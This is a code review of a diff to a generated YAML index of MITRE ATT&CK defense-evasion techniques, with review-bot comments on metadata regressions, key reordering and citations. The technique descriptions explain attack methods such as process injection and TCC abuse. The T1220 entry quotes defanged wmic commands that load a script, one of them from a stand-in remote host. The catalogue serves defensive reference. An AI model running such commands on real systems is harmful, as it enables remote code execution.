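Review bot: `modified` for T1221 goes backwards in this hunk, from `'2022-05-11T14:00:00.188Z'` to `'2022-01-12T18:16:56.176Z'`. The same regression appears below for T1134, T1564.005, T1055.005, T1622, T1055.008 and T1027.007, and the old values all share the `14:00:00.188Z` time of day, which reads like a release-wide stamp rather than the per-object edit time that the new values carry. That is fine if the new source is the authoritative one, but anything that compares `modified` against a last-reviewed date to flag atomic tests needing attention would now skip these techniques; worth a note in the PR description.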
@@ -12466,13 +12785,11 @@ defense-evasion:
x_mitre_permissions_required:
- User
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1221
atomic_tests: []
T1134:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:47.762Z'
name: Access Token Manipulation
description: |-
Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
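Review bot: `- x_mitre_attack_spec_version: 2.1.0` is removed from T1221 in this hunk with no `+` replacement visible, unlike T1556.005 and T1070.004 above, which get `x_mitre_attack_spec_version: 3.2.0`. T1564.005, T1055.005 and T1055.008 show the same removal-only pattern below. Confirm the field is re-added elsewhere in each of those objects (it may just have moved during the key reorder); otherwise four techniques end up without a spec version while the rest of the index has one.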
@@ -12569,7 +12886,6 @@ defense-evasion:
url: https://pentestlab.blog/2017/04/03/token-manipulation/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
atomic_tests: []
T1027.002:
technique:
@@ -12632,7 +12948,6 @@ defense-evasion:
url: https://www.welivesecurity.com/wp-content/uploads/2018/01/WP-FinFisher.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1027.002
atomic_tests: []
T1564.005:
@@ -12670,7 +12985,7 @@ defense-evasion:
description: 'Kaspersky Lab''s Global Research and Analysis Team. (2015, February).
Equation Group: Questions and Answers. Retrieved December 21, 2015.'
url: https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08064459/Equation_group_questions_and_answers.pdf
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-06-29T15:12:11.024Z'
name: Hidden File System
description: |-
Adversaries may use a hidden file system to conceal malicious activity from users and security tools. File systems provide a structure to store and access data from physical storage. Typically, a user engages with a file system through applications that allow them to access files and directories, which are an abstraction from their physical location (ex: disk sector). Standard file systems include FAT, NTFS, ext4, and APFS. File systems can also contain other structures, such as the Volume Boot Record (VBR) and Master File Table (MFT) in NTFS.(Citation: MalwareTech VFS Nov 2014)
@@ -12697,8 +13012,6 @@ defense-evasion:
x_mitre_permissions_required:
- User
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1055.005:
technique:
@@ -12726,7 +13039,7 @@ defense-evasion:
A Technical Survey Of Common And Trending Process Injection Techniques.
Retrieved December 7, 2017.'
source_name: Elastic Process Injection July 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T12:24:54.198Z'
name: Thread Local Storage
description: "Adversaries may inject malicious code into processes via thread
local storage (TLS) callbacks in order to evade process-based defenses as
@@ -12770,8 +13083,6 @@ defense-evasion:
x_mitre_defense_bypassed:
- Anti-virus
- Application control
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1622:
technique:
@@ -12826,7 +13137,7 @@ defense-evasion:
Specific checks will vary based on the target and/or adversary, but may involve [Native API](https://attack.mitre.org/techniques/T1106) function calls such as IsDebuggerPresent()
and NtQueryInformationProcess()
, or manually checking the BeingDebugged
flag of the Process Environment Block (PEB). Other checks for debugging artifacts may also seek to enumerate hardware breakpoints, interrupt assembly opcodes, time checks, or measurements if exceptions are raised in the current process (assuming a present debugger would “swallow” or handle the potential error).(Citation: hasherezade debug)(Citation: AlKhaser Debug)(Citation: vxunderground debug)
Adversaries may use the information learned from these debugger checks during automated discovery to shape follow-on behaviors. Debuggers can also be evaded by detaching the process or flooding debug logs with meaningless data via messages produced by looping [Native API](https://attack.mitre.org/techniques/T1106) function calls such as OutputDebugStringW()
.(Citation: wardle evilquest partii)(Citation: Checkpoint Dridex Jan 2021)
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-16T15:05:55.918Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Debugger Evasion
x_mitre_detection: |-
@@ -12846,7 +13157,6 @@ defense-evasion:
- 'Command: Command Execution'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1622
atomic_tests: []
T1036.006:
@@ -12896,7 +13206,6 @@ defense-evasion:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
identifier: T1036.006
atomic_tests: []
T1550.002:
@@ -12951,12 +13260,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1550.002
atomic_tests: []
T1574.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:47.241Z'
name: 'Hijack Execution Flow: DLL Side-Loading'
description: |-
Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
@@ -13006,12 +13314,11 @@ defense-evasion:
url: https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-dll-sideloading.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1574.002
atomic_tests: []
T1216.002:
technique:
- modified: '2024-04-18T23:51:40.464Z'
+ modified: '2024-09-12T19:42:21.547Z'
name: SyncAppvPublishingServer
description: "Adversaries may abuse SyncAppvPublishingServer.vbs to proxy execution
of malicious [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands.
@@ -13071,8 +13378,8 @@ defense-evasion:
- source_name: 7 - appv
description: Nick Landers. (2017, August 8). Need a signed alternative to
Powershell.exe? SyncAppvPublishingServer in Win10 has got you covered..
- Retrieved February 6, 2024.
- url: https://twitter.com/monoxgas/status/895045566090010624
+ Retrieved September 12, 2024.
+ url: https://x.com/monoxgas/status/895045566090010624
- source_name: 3 - appv
description: 'Raj Chandel. (2022, March 17). Indirect Command Execution: Defense
Evasion (T1202). Retrieved February 6, 2024.'
@@ -13089,37 +13396,18 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1548.006:
technique:
- modified: '2024-04-17T00:02:12.021Z'
+ modified: '2024-10-16T16:54:56.714Z'
name: TCC Manipulation
- description: "Adversaries can manipulate or abuse the Transparency, Consent,
- & Control (TCC) service or database to execute malicious applications with
- elevated permissions. TCC is a Privacy & Security macOS control mechanism
- used to determine if the running process has permission to access the data
- or services protected by TCC, such as screen sharing, camera, microphone,
- or Full Disk Access (FDA).\n\nWhen an application requests to access data
- or a service protected by TCC, the TCC daemon (`tccd`) checks the TCC database,
- located at `/Library/Application Support/com.apple.TCC/TCC.db` (and `~/` equivalent),
- for existing permissions. If permissions do not exist, then the user is prompted
- to grant permission. Once permissions are granted, the database stores the
- application's permissions and will not prompt the user again unless reset.
- For example, when a web browser requests permissions to the user's webcam,
- once granted the web browser may not explicitly prompt the user again.(Citation:
- welivesecurity TCC)\n\nAdversaries may manipulate the TCC database or otherwise
- abuse the TCC service to execute malicious content. This can be done in various
- ways, including using privileged system applications to execute malicious
- payloads or manipulating the database to grant their application TCC permissions.
- \n\nFor example, adversaries can use Finder, which has FDA permissions by
- default, to execute malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002)
- while preventing a user prompt. For a system without System Integrity Protection
- (SIP) enabled, adversaries have also manipulated the operating system to load
- an adversary controlled TCC database using environment variables and [Launchctl](https://attack.mitre.org/techniques/T1569/001).(Citation:
- TCC macOS bypass)(Citation: TCC Database)\n\nAdversaries may also opt to instead
- inject code (e.g., [Process Injection](https://attack.mitre.org/techniques/T1055))
- into targeted applications with the desired TCC permissions.\n"
+ description: |+
+ Adversaries can manipulate or abuse the Transparency, Consent, & Control (TCC) service or database to grant malicious executables elevated permissions. TCC is a Privacy & Security macOS control mechanism used to determine if the running process has permission to access the data or services protected by TCC, such as screen sharing, camera, microphone, or Full Disk Access (FDA).
+
+ When an application requests to access data or a service protected by TCC, the TCC daemon (`tccd`) checks the TCC database, located at `/Library/Application Support/com.apple.TCC/TCC.db` (and `~/` equivalent), and an overwrites file (if connected to an MDM) for existing permissions. If permissions do not exist, then the user is prompted to grant permission. Once permissions are granted, the database stores the application's permissions and will not prompt the user again unless reset. For example, when a web browser requests permissions to the user's webcam, once granted the web browser may not explicitly prompt the user again.(Citation: welivesecurity TCC)
+
+ Adversaries may access restricted data or services protected by TCC through abusing applications previously granted permissions through [Process Injection](https://attack.mitre.org/techniques/T1055) or executing a malicious binary using another application. For example, adversaries can use Finder, a macOS native app with FDA permissions, to execute a malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002). When executing under the Finder App, the malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002) inherits access to all files on the system without requiring a user prompt. When System Integrity Protection (SIP) is disabled, TCC protections are also disabled. For a system without SIP enabled, adversaries can manipulate the TCC database to add permissions to their malicious executable through loading an adversary controlled TCC database using environment variables and [Launchctl](https://attack.mitre.org/techniques/T1569/001).(Citation: TCC macOS bypass)(Citation: TCC Database)
+
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
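Review bot: the new `description: |+` block ends with an empty `+` line before `kill_chain_phases:`; with the keep (`|+`) chomping indicator that blank line is part of the value, so the string now ends in two newlines where the old quoted scalar ended in one (`...with the desired TCC permissions.\n"`). If `|+` was chosen only to preserve upstream's single trailing newline, `|` (clip) does that without the extra one; the difference is invisible in the index itself but will surface as an extra blank line in anything rendered from it. Separately, the new text `and an overwrites file (if connected to an MDM)` reads as a typo for "overrides file"; that wording comes from ATT&CK rather than this PR, so it belongs in an upstream report, not a local edit of generated data.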
@@ -13127,6 +13415,8 @@ defense-evasion:
phase_name: privilege-escalation
x_mitre_contributors:
- Marina Liang
+ - Wojciech Reguła @_r3ggi
+ - Csaba Fitzl @theevilbit of Kandji
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
@@ -13134,7 +13424,7 @@ defense-evasion:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- macOS
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'File: File Modification'
@@ -13164,7 +13454,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1055.008:
technique:
@@ -13210,7 +13499,7 @@ defense-evasion:
description: stderr. (2014, February 14). Detecting Userland Preload Rootkits.
Retrieved December 20, 2017.
source_name: Chokepoint preload rootkits
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T12:26:31.766Z'
name: Ptrace System Calls
description: "Adversaries may inject malicious code into processes via ptrace
(process trace) system calls in order to evade process-based defenses as well
@@ -13255,8 +13544,6 @@ defense-evasion:
x_mitre_defense_bypassed:
- Anti-virus
- Application control
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1027.007:
technique:
@@ -13301,7 +13588,7 @@ defense-evasion:
To avoid static or other defensive analysis, adversaries may use dynamic API resolution to conceal malware characteristics and functionalities. Similar to [Software Packing](https://attack.mitre.org/techniques/T1027/002), dynamic API resolution may change file signatures and obfuscate malicious API function calls until they are resolved and invoked during runtime.
Various methods may be used to obfuscate malware calls to API functions. For example, hashes of function names are commonly stored in malware in lieu of literal strings. Malware can use these hashes (or other identifiers) to manually reproduce the linking and loading process using functions such as `GetProcAddress()` and `LoadLibrary()`. These hashes/identifiers can also be further obfuscated using encryption or other string manipulation tricks (requiring various forms of [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) during execution).(Citation: BlackHat API Packers)(Citation: Drakonia HInvoke)(Citation: Huntress API Hash)
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-08-23T18:32:46.899Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Obfuscated Files or Information: Dynamic API Resolution'
x_mitre_detection: ''
@@ -13315,58 +13602,28 @@ defense-evasion:
- 'Process: OS API Execution'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1027.007
atomic_tests: []
T1055.015:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - ESET
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--eb2cb5cb-ae87-4de0-8c35-da2a17aafb99
- type: attack-pattern
- created: '2021-11-22T15:02:15.190Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1055.015
- url: https://attack.mitre.org/techniques/T1055/015
- - source_name: Microsoft List View Controls
- url: https://docs.microsoft.com/windows/win32/controls/list-view-controls-overview
- description: Microsoft. (2021, May 25). About List-View Controls. Retrieved
- January 4, 2022.
- - source_name: Modexp Windows Process Injection
- url: https://modexp.wordpress.com/2019/04/25/seven-window-injection-methods/
- description: 'odzhan. (2019, April 25). Windows Process Injection: WordWarping,
- Hyphentension, AutoCourgette, Streamception, Oleum, ListPlanting, Treepoline.
- Retrieved November 15, 2021.'
- - source_name: ESET InvisiMole June 2020
- url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
- description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE
- HIDDEN PART OF THE STORY. Retrieved July 16, 2020.'
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-08-14T17:34:33.948Z'
name: 'Process Injection: ListPlanting'
description: "Adversaries may abuse list-view controls to inject malicious code
into hijacked processes in order to evade process-based defenses as well as
possibly elevate privileges. ListPlanting is a method of executing arbitrary
- code in the address space of a separate live process. Code executed via ListPlanting
- may also evade detection from security products since the execution is masked
- under a legitimate process.\n\nList-view controls are user interface windows
- used to display collections of items.(Citation: Microsoft List View Controls)
- Information about an application's list-view settings are stored within the
- process' memory in a SysListView32
control.\n\nListPlanting (a
- form of message-passing \"shatter attack\") may be performed by copying code
- into the virtual address space of a process that uses a list-view control
- then using that code as a custom callback for sorting the listed items.(Citation:
- Modexp Windows Process Injection) Adversaries must first copy code into the
- target process’ memory space, which can be performed various ways including
- by directly obtaining a handle to the SysListView32
child of
- the victim process window (via Windows API calls such as FindWindow
+ code in the address space of a separate live process.(Citation: Hexacorn Listplanting)
+ Code executed via ListPlanting may also evade detection from security products
+ since the execution is masked under a legitimate process.\n\nList-view controls
+ are user interface windows used to display collections of items.(Citation:
+ Microsoft List View Controls) Information about an application's list-view
+ settings are stored within the process' memory in a SysListView32
+ control.\n\nListPlanting (a form of message-passing \"shatter attack\") may
+ be performed by copying code into the virtual address space of a process that
+ uses a list-view control then using that code as a custom callback for sorting
+ the listed items.(Citation: Modexp Windows Process Injection) Adversaries
+ must first copy code into the target process’ memory space, which can be performed
+ various ways including by directly obtaining a handle to the SysListView32
+ child of the victim process window (via Windows API calls such as FindWindow
and/or EnumWindows
) or other [Process Injection](https://attack.mitre.org/techniques/T1055)
methods.\n\nSome variations of ListPlanting may allocate memory in the target
process but then use window messages to copy the payload, to avoid the use
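Review bot: the description gains `(Citation: Hexacorn Listplanting)` after `code in the address space of a separate live process.`; a citation key used in a description needs a matching `source_name` under `external_references`, or the rendered Markdown is left with a dangling citation. The matching entry (`- source_name: Hexacorn Listplanting` with the hexacorn.com URL) is added in the later hunk for this object, so that is covered. The remaining `-`/`+` lines in this hunk carry identical text that has only been re-wrapped, which is the same generator reflow noise seen in the earlier objects.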
@@ -13383,6 +13640,9 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_contributors:
+ - ESET
+ x_mitre_deprecated: false
x_mitre_detection: "Monitoring Windows API calls indicative of the various types
of code injection may generate a significant amount of data and may not be
directly useful for defense unless collected under specific circumstances
@@ -13397,21 +13657,52 @@ defense-evasion:
arguments.\n\nAnalyze process behavior to determine if a process is performing
unusual actions, such as opening network connections, reading files, or other
suspicious actions that could relate to post-compromise behavior. "
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Process: Process Modification'
- 'Process: OS API Execution'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--eb2cb5cb-ae87-4de0-8c35-da2a17aafb99
+ created: '2021-11-22T15:02:15.190Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1055/015
+ external_id: T1055.015
+ - source_name: Hexacorn Listplanting
+ description: Hexacorn. (2019, April 25). Listplanting – yet another code injection
+ trick. Retrieved August 14, 2024.
+ url: https://www.hexacorn.com/blog/2019/04/25/listplanting-yet-another-code-injection-trick/
+ - source_name: ESET InvisiMole June 2020
+ description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE
+ HIDDEN PART OF THE STORY. Retrieved July 16, 2020.'
+ url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
+ - source_name: Microsoft List View Controls
+ description: Microsoft. (2021, May 25). About List-View Controls. Retrieved
+ January 4, 2022.
+ url: https://docs.microsoft.com/windows/win32/controls/list-view-controls-overview
+ - source_name: Modexp Windows Process Injection
+ description: 'odzhan. (2019, April 25). Windows Process Injection: WordWarping,
+ Hyphentension, AutoCourgette, Streamception, Oleum, ListPlanting, Treepoline.
+ Retrieved November 15, 2021.'
+ url: https://modexp.wordpress.com/2019/04/25/seven-window-injection-methods/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1055.015
atomic_tests: []
T1484:
technique:
- modified: '2024-04-19T04:27:31.884Z'
+ modified: '2024-10-15T15:55:32.946Z'
name: Domain or Tenant Policy Modification
description: "Adversaries may modify the configuration settings of a domain
or identity tenant to evade defenses and/or escalate privileges in centrally
@@ -13456,9 +13747,8 @@ defense-evasion:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Azure AD
- - SaaS
- x_mitre_version: '3.0'
+ - Identity Provider
+ x_mitre_version: '3.1'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Deletion'
- 'Active Directory: Active Directory Object Creation'
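Review bot: `- Azure AD` and `- SaaS` are replaced by `- Identity Provider` in `x_mitre_platforms` for T1484, with `x_mitre_version` going `'3.0'` to `'3.1'`. If any derived index or filter in this repo keys on the platform strings, an Azure AD or SaaS view that listed T1484 will now silently drop it, and an `Identity Provider` view has to exist for the technique to land anywhere; confirm the platform-specific outputs are regenerated in the same change and that their set of platform names now includes `Identity Provider`.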
@@ -13515,8 +13805,8 @@ defense-evasion:
url: https://wald0.com/?p=179
- source_name: Harmj0y Abusing GPO Permissions
description: Schroeder, W. (2016, March 17). Abusing GPO Permissions. Retrieved
- March 5, 2019.
- url: http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/
+ September 23, 2024.
+ url: https://blog.harmj0y.net/redteaming/abusing-gpo-permissions/
- source_name: Sygnia Golden SAML
description: Sygnia. (2020, December). Detection and Hunting of Golden SAML
Attack. Retrieved January 6, 2021.
@@ -13525,57 +13815,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1220:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Avneet Singh
- - Casey Smith
- - Praetorian
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- id: attack-pattern--ebbe170d-aa74-4946-8511-9921243415a3
- created: '2018-10-17T00:14:20.652Z'
- x_mitre_version: '1.2'
- external_references:
- - source_name: mitre-attack
- external_id: T1220
- url: https://attack.mitre.org/techniques/T1220
- - source_name: Reaqta MSXSL Spearphishing MAR 2018
- url: https://reaqta.com/2018/03/spear-phishing-campaign-leveraging-msxsl/
- description: Admin. (2018, March 2). Spear-phishing campaign leveraging on
- MSXSL. Retrieved July 3, 2018.
- - source_name: Twitter SquiblyTwo Detection APR 2018
- url: https://twitter.com/dez_/status/986614411711442944
- description: Desimone, J. (2018, April 18). Status Update. Retrieved July
- 3, 2018.
- - source_name: LOLBAS Wmic
- url: https://lolbas-project.github.io/lolbas/Binaries/Wmic/
- description: LOLBAS. (n.d.). Wmic.exe. Retrieved July 31, 2019.
- - source_name: Microsoft msxsl.exe
- url: https://www.microsoft.com/download/details.aspx?id=21714
- description: Microsoft. (n.d.). Command Line Transformation Utility (msxsl.exe).
- Retrieved July 3, 2018.
- - source_name: Penetration Testing Lab MSXSL July 2017
- url: https://pentestlab.blog/2017/07/06/applocker-bypass-msxsl/
- description: netbiosX. (2017, July 6). AppLocker Bypass – MSXSL. Retrieved
- July 3, 2018.
- - source_name: XSL Bypass Mar 2019
- url: https://medium.com/@threathuntingteam/msxsl-exe-and-wmic-exe-a-way-to-proxy-code-execution-8d524f642b75
- description: Singh, A. (2019, March 14). MSXSL.EXE and WMIC.EXE — A Way to
- Proxy Code Execution. Retrieved August 2, 2019.
- - source_name: Microsoft XSLT Script Mar 2017
- url: https://docs.microsoft.com/dotnet/standard/data/xml/xslt-stylesheet-scripting-using-msxsl-script
- description: Wenzel, M. et al. (2017, March 30). XSLT Stylesheet Scripting
- Using . Retrieved July 3, 2018.
- x_mitre_deprecated: false
- revoked: false
+ modified: '2024-09-12T19:40:12.337Z'
+ name: XSL Script Processing
description: |-
Adversaries may bypass application control and obscure execution of code by embedding scripts inside XSL files. Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files. To support complex operations, the XSL standard includes support for embedded scripting in various languages. (Citation: Microsoft XSLT Script Mar 2017)
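Review bot: The removal of `spec_version: '2.1'` at the top of this hunk (the tail of the preceding technique's block) is the first of many such deletions in this patch, and the PR description should state that dropping the STIX envelope field from every technique object is intentional: a consumer that validates these entries as STIX 2.1 objects will now find no `spec_version` to check. Separately, the T1220 block is re-emitted with a different key order (`x_mitre_platforms`, `x_mitre_domains`, `x_mitre_contributors` and the `external_references` list all move), so a change that amounts to a new `modified` timestamp and a name line becomes a sixty-line diff; emitting keys in a stable, sorted order in the generator would keep future regenerations reviewable.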
@@ -13593,29 +13837,73 @@ defense-evasion:
* Local File: wmic process list /FORMAT:evil[.]xsl
* Remote File: wmic os get /FORMAT:”https[:]//example[.]com/evil[.]xsl”
- modified: '2022-05-24T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: XSL Script Processing
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ x_mitre_contributors:
+ - Avneet Singh
+ - Casey Smith
+ - Praetorian
+ x_mitre_deprecated: false
x_mitre_detection: |-
Use process monitoring to monitor the execution and arguments of msxsl.exe and wmic.exe. Compare recent invocations of these utilities with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity (ex: URL command line arguments, creation of external network connections, loading of DLLs associated with scripting). (Citation: LOLBAS Wmic) (Citation: Twitter SquiblyTwo Detection APR 2018) Command arguments used before and after the script invocation may also be useful in determining the origin and purpose of the payload being loaded.
The presence of msxsl.exe or other utilities that enable proxy execution that are typically used for development, debugging, and reverse engineering on a system that is not used for these purposes may be suspicious.
- kill_chain_phases:
- - phase_name: defense-evasion
- kill_chain_name: mitre-attack
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Module: Module Load'
- 'Process: Process Creation'
- x_mitre_system_requirements:
- - Microsoft Core XML Services (MSXML) or access to wmic.exe
x_mitre_defense_bypassed:
- Anti-virus
- Digital Certificate Validation
- Application Control
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_system_requirements:
+ - Microsoft Core XML Services (MSXML) or access to wmic.exe
+ type: attack-pattern
+ id: attack-pattern--ebbe170d-aa74-4946-8511-9921243415a3
+ created: '2018-10-17T00:14:20.652Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1220
+ external_id: T1220
+ - source_name: Reaqta MSXSL Spearphishing MAR 2018
+ description: Admin. (2018, March 2). Spear-phishing campaign leveraging on
+ MSXSL. Retrieved July 3, 2018.
+ url: https://reaqta.com/2018/03/spear-phishing-campaign-leveraging-msxsl/
+ - source_name: Twitter SquiblyTwo Detection APR 2018
+ description: Desimone, J. (2018, April 18). Status Update. Retrieved September
+ 12, 2024.
+ url: https://x.com/dez_/status/986614411711442944
+ - source_name: LOLBAS Wmic
+ description: LOLBAS. (n.d.). Wmic.exe. Retrieved July 31, 2019.
+ url: https://lolbas-project.github.io/lolbas/Binaries/Wmic/
+ - source_name: Microsoft msxsl.exe
+ description: Microsoft. (n.d.). Command Line Transformation Utility (msxsl.exe).
+ Retrieved July 3, 2018.
+ url: https://www.microsoft.com/download/details.aspx?id=21714
+ - source_name: Penetration Testing Lab MSXSL July 2017
+ description: netbiosX. (2017, July 6). AppLocker Bypass – MSXSL. Retrieved
+ July 3, 2018.
+ url: https://pentestlab.blog/2017/07/06/applocker-bypass-msxsl/
+ - source_name: XSL Bypass Mar 2019
+ description: Singh, A. (2019, March 14). MSXSL.EXE and WMIC.EXE — A Way to
+ Proxy Code Execution. Retrieved August 2, 2019.
+ url: https://medium.com/@threathuntingteam/msxsl-exe-and-wmic-exe-a-way-to-proxy-code-execution-8d524f642b75
+ - source_name: Microsoft XSLT Script Mar 2017
+ description: Wenzel, M. et al. (2017, March 30). XSLT Stylesheet Scripting
+ Using . Retrieved July 3, 2018.
+ url: https://docs.microsoft.com/dotnet/standard/data/xml/xslt-stylesheet-scripting-using-msxsl-script
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1220
atomic_tests: []
T1564.001:
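Review bot: The "Microsoft XSLT Script Mar 2017" reference is re-emitted with a word missing from its title, `XSLT Stylesheet Scripting Using . Retrieved July 3, 2018.`; the token after "Using" was almost certainly an angle-bracketed element name that the conversion stripped as markup. It is carried over unchanged from the `-` side, so it is a pre-existing generator issue rather than a regression, but the converter should escape rather than strip such text. The `Twitter SquiblyTwo Detection APR 2018` entry is a good model for reference updates here: the host change to `x.com` comes with a refreshed `Retrieved September 12, 2024` date.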
@@ -13648,7 +13936,7 @@ defense-evasion:
description: 'Claud Xiao. (n.d.). WireLurker: A New Era in iOS and OS X Malware.
Retrieved July 10, 2017.'
source_name: WireLurker
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-29T22:32:25.985Z'
name: 'Hide Artifacts: Hidden Files and Directories'
description: |-
Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches (dir /a
for Windows and ls –a
for Linux and macOS).
